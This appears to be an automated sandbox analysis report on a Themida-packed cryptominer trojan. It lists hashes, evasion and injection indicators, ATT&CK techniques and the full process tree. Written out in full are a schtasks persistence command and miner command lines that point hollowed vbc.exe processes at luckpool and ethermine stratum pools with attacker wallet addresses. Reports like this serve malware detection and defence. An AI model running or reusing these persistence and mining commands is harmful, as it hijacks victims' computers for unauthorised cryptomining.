4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324

Analysis

max time kernel
296s
max time network
286s
platform
windows10-1703_x64
resource
win10-20220718-en
resource tags

arch:x64arch:x86image:win10-20220718-enlocale:en-usos:windows10-1703-x64system
submitted
06-08-2022 10:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
Size

3.4MB
MD5

b67da452eabdb5202468322d11b07c01
SHA1

698f6779381714ec3c7d19840da6a679da918e84
SHA256

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324
SHA512

2d4547769f16537ca5e9a9c1beba7ee7047594b1789a25223855a9f86fe1eafdf005d69c57b63f5ff65bbad12052226782e5d558323590057d4eac2f90091205

Score

9^/10

evasion miner themida trojan

Malware Config

Signatures

Detected Stratum cryptominer command 1 IoCs
Looks to be attempting to contact Stratum mining pool.
miner

Processes:

vbc.exe

pid process

508 vbc.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
Executes dropped EXE 3 IoCs

Processes:

ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exeAZWZGASDYNOOA.exeAZWZGASDYNOOA.exe

pid process

3692 ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
1092 AZWZGASDYNOOA.exe
1700 AZWZGASDYNOOA.exe

pid	process
508	vbc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

pid	process
3692	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
1092	AZWZGASDYNOOA.exe
1700	AZWZGASDYNOOA.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/1240-160-0x0000000000380000-0x00000000009A6000-memory.dmp	themida
behavioral2/memory/1240-189-0x0000000000380000-0x00000000009A6000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

pid process

1240 4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

AZWZGASDYNOOA.exe

description	pid	process	target process
PID 1092 set thread context of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 set thread context of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2116 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2608 timeout.exe

pid	process
2116	schtasks.exe

pid	process
2608	timeout.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exeAZWZGASDYNOOA.exe

pid	process
1240	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
1240	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
1092	AZWZGASDYNOOA.exe
1092	AZWZGASDYNOOA.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exessfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exeAZWZGASDYNOOA.exe

description	pid	process
Token: SeDebugPrivilege	1240	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
Token: SeDebugPrivilege	3692	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Token: SeDebugPrivilege	1092	AZWZGASDYNOOA.exe

Suspicious use of WriteProcessMemory 41 IoCs

Processes:

4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exessfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.execmd.exeAZWZGASDYNOOA.execmd.exevbc.exe

description	pid	process	target process
PID 1240 wrote to memory of 3692	1240	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
PID 1240 wrote to memory of 3692	1240	4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
PID 3692 wrote to memory of 2012	3692	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe	cmd.exe
PID 3692 wrote to memory of 2012	3692	ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe	cmd.exe
PID 2012 wrote to memory of 2608	2012	cmd.exe	timeout.exe
PID 2012 wrote to memory of 2608	2012	cmd.exe	timeout.exe
PID 2012 wrote to memory of 1092	2012	cmd.exe	AZWZGASDYNOOA.exe
PID 2012 wrote to memory of 1092	2012	cmd.exe	AZWZGASDYNOOA.exe
PID 1092 wrote to memory of 3304	1092	AZWZGASDYNOOA.exe	cmd.exe
PID 1092 wrote to memory of 3304	1092	AZWZGASDYNOOA.exe	cmd.exe
PID 3304 wrote to memory of 2116	3304	cmd.exe	schtasks.exe
PID 3304 wrote to memory of 2116	3304	cmd.exe	schtasks.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 508	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 508 wrote to memory of 3320	508	vbc.exe	cmd.exe
PID 508 wrote to memory of 3320	508	vbc.exe	cmd.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe
PID 1092 wrote to memory of 2172	1092	AZWZGASDYNOOA.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe
"C:\Users\Admin\AppData\Local\Temp\4ef945fd32cf250232ef9269f349844f652af3b79f9f05d45495c80d507b8324.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1240

C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
"C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7469.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:2608

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
"C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3304

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFiihDJ8WoynFyMePc1sP28nmxoLmatE9n.work -p x -t 4
5⤵
- Detected Stratum cryptominer command
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
6⤵
PID:3320

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe --pool stratum://0xd522E4e1279f59e64625757D66ba4Cbb20D6dC0C.WORKER@eu1.ethermine.org:4444 --cinit-max-gpu=80
5⤵
PID:2172

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "AZWZGASDYNOOA" /tr "C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe"
1⤵
- Creates scheduled task(s)
PID:2116

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
1⤵
- Executes dropped EXE
PID:1700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\ProgramData\rootsystems\AZWZGASDYNOOA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7469.tmp.bat
Filesize
153B

MD5
c93b11b1191cffcbb063f294f271e90d

SHA1
38e6cd959b899e876edeef50e4c36920c86d66d3

SHA256
8d4083744fc8b312857e180cd0c7181ab7f7fac430a631c074976d945359925b

SHA512
3fd7e01abe13da8ab5a8472c2ba3f694019bed075393154c8f5fe46aa3c8026fc252507d96f155f6d0351a14ea959098ac06200f77d6391276ee11245ae30e56

Download Submit
C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
C:\Users\Admin\AppData\Roaming\ssfFACkHCSBHhHhhCscBSEHAKhKehHuSAFbaEehbhfKSKUUFEUeHCeA.exe
Filesize
845KB

MD5
93b40ed9ef66ae2c72c9b29cfde49a9a

SHA1
90f356d379e9003ec9fba486f87b06e12ace89bc

SHA256
7cf14371db51b67557ca62b3cb9fc79e18647aea00d4540f9caf1c44316f3813

SHA512
d20b7d1e8da6299add1c51c245c886be273ed429941bf6272bb7b178bff2611d967557e9bfbe420a5c7bcd281c9d8830d53625fc8757bb2710581ba77b47ab00

Download Submit
memory/508-204-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/508-203-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/508-199-0x000000014006EE80-mapping.dmp

Download
memory/1092-193-0x0000000000000000-mapping.dmp

Download
memory/1240-159-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-163-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-128-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-127-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-129-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-130-0x0000000000380000-0x00000000009A6000-memory.dmp

Filesize
6.1MB

Download
memory/1240-131-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-132-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-133-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-134-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-135-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-136-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-137-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-138-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-139-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-140-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-141-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-143-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-142-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-144-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-145-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-146-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-147-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-148-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-149-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-150-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-151-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-153-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-154-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-156-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-155-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-157-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-125-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-158-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-160-0x0000000000380000-0x00000000009A6000-memory.dmp

Filesize
6.1MB

Download
memory/1240-161-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-162-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-126-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-164-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-165-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-166-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-167-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-168-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-169-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-170-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-171-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-172-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-173-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-174-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-175-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-176-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-177-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-178-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-180-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-179-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-181-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-186-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-185-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-189-0x0000000000380000-0x00000000009A6000-memory.dmp

Filesize
6.1MB

Download
memory/1240-117-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-118-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-124-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-123-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-122-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-121-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-119-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/1240-120-0x0000000077BC0000-0x0000000077D4E000-memory.dmp

Filesize
1.6MB

Download
memory/2012-190-0x0000000000000000-mapping.dmp

Download
memory/2116-197-0x0000000000000000-mapping.dmp

Download
memory/2172-206-0x000000014025502C-mapping.dmp

Download
memory/2608-192-0x0000000000000000-mapping.dmp

Download
memory/3304-196-0x0000000000000000-mapping.dmp

Download
memory/3320-202-0x0000000000000000-mapping.dmp

Download
memory/3692-187-0x0000000000B10000-0x0000000000BE8000-memory.dmp

Filesize
864KB

Download
memory/3692-182-0x0000000000000000-mapping.dmp

Download